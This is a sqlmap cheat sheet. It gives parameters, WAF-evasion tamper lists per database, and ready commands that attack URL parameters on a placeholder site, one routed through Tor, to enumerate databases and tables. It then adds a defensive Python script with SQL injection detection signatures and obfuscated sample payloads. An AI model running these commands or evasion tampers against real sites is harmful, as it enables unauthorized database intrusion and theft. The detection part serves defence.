SQLMap
SQLMap - Automatic SQL injection and database takeover tool (GitHub: sqlmapproject/sqlmap)

SQLMap parameters

-u: URL to attack
-r: Request file
-p: Parameter to
-v: Verbosity level (0-6, default 1)
--proxy: Use a proxy to connect to target URL
--tor: Use Tor anonymity network
--random-agent: Use a random user agent
--level: Level of tests to perform (1-5, default 1)
--risk: Risk of tests to perform (1-3, default 1)
--batch: Never ask for user input, use the default behavior
--is-dba: Check if user is DBA admin
--tamper: Select one or multiple tampers to use
--dbms: Force back-end DBMS to provided value
--flush-session: Flush session files for current target
--technique: SQL Injection techniques to use (default "BEUSTQ")
    B: Boolean-based blind
    E: Error-based blind
    U: Union query-based
    S: Stacked queries
    T: Time-based blind
    Q: Inline queries
--dbs: Check for available DBs
--tables: Check tables for a selected DB
--dump: Dump a selected table
-D: Select a DB
-T: Select a table
It is not recommended to use all of the tampers listed below at the same time.

General purpose

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

MSSQL

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

Usage examples

# Attack the 'id' parameter using a request file, forcing a MySQL back-end. List databases
sqlmap -r request -p id --batch --level 5 --risk 2 --dbms=MySQL --dbs

# Attack the 'id' parameter of the 'https://web.com' URL through the Tor network. List tables of the 'Users' database
sqlmap -u "https://web.com/user?id=1" --batch --tor -D Users --tables

# Attack the 'position' parameter of the 'https://web.com' URL using three tampers. List databases
# (the URL is quoted so the shell does not treat '&' as a background operator)
sqlmap -u "https://web.com/user?id=1&position=100" -p position --batch --dbs --tamper=between,charencode,space2comment
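
Seen from the defending side, the tampers in the last usage example (between, charencode, space2comment) only change how a payload is spelled, so log or WAF matching has to normalize parameter values before applying signatures. The following is an added example, not part of the original cheat sheet or of the sqlmap project; the signature set, the sample requests and the helper names normalize and inspect_request are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Illustrative signatures, matched only AFTER normalization (not a complete rule set).
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "boolean-compare": re.compile(r"\b(and|or)\s+\d+\s*[=<>]\s*\d+"),
    "between-rewrite": re.compile(r"\b(and|or)\s+\S+\s+(not\s+)?between\s+\S+\s+and\s+\S+"),
    "time-delay": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b"),
}

def normalize(value, max_rounds=3):
    """Reduce a raw parameter value to plain lower-case SQL-like text."""
    for _ in range(max_rounds):                 # charencode, chardoubleencode
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # space2comment
    value = value.replace("+", " ")                        # space2plus
    return re.sub(r"\s+", " ", value).strip().lower()      # multiplespaces, randomcase

def inspect_request(url, user_agent=""):
    """Return sorted 'source:finding' strings for one logged request."""
    findings = set()
    # sqlmap's default User-Agent starts with "sqlmap/"; --random-agent replaces it,
    # so this check alone is never sufficient.
    if user_agent.lower().startswith("sqlmap/"):
        findings.add("user-agent:sqlmap")
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        text = normalize(raw)
        for label, pattern in SIGNATURES.items():
            if pattern.search(text):
                findings.add(f"{name}:{label}")
    return sorted(findings)

# Constructed sample requests (path and parameter names follow the usage examples).
SAMPLES = [
    ("/user?id=1&position=100", "Mozilla/5.0"),
    ("/user?id=1&position=100/**/uNiOn/**/aLl/**/SeLeCt/**/NULL", "sqlmap/0.0 (constructed)"),
    ("/user?id=1&position=1%2F%2A%2A%2FAND%2F%2A%2A%2F5%2F%2A%2A%2FNOT%2F%2A%2A%2F"
     "BETWEEN%2F%2A%2A%2F0%2F%2A%2A%2FAND%2F%2A%2A%2F3", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for url, agent in SAMPLES:
        print(url[:40], "->", inspect_request(url, agent))
```

The third sample shows why signatures keyed on `=` or `>` miss traffic rewritten by the between tamper: after decoding, the comparison appears as NOT BETWEEN 0 AND, so the rule has to match that form as well.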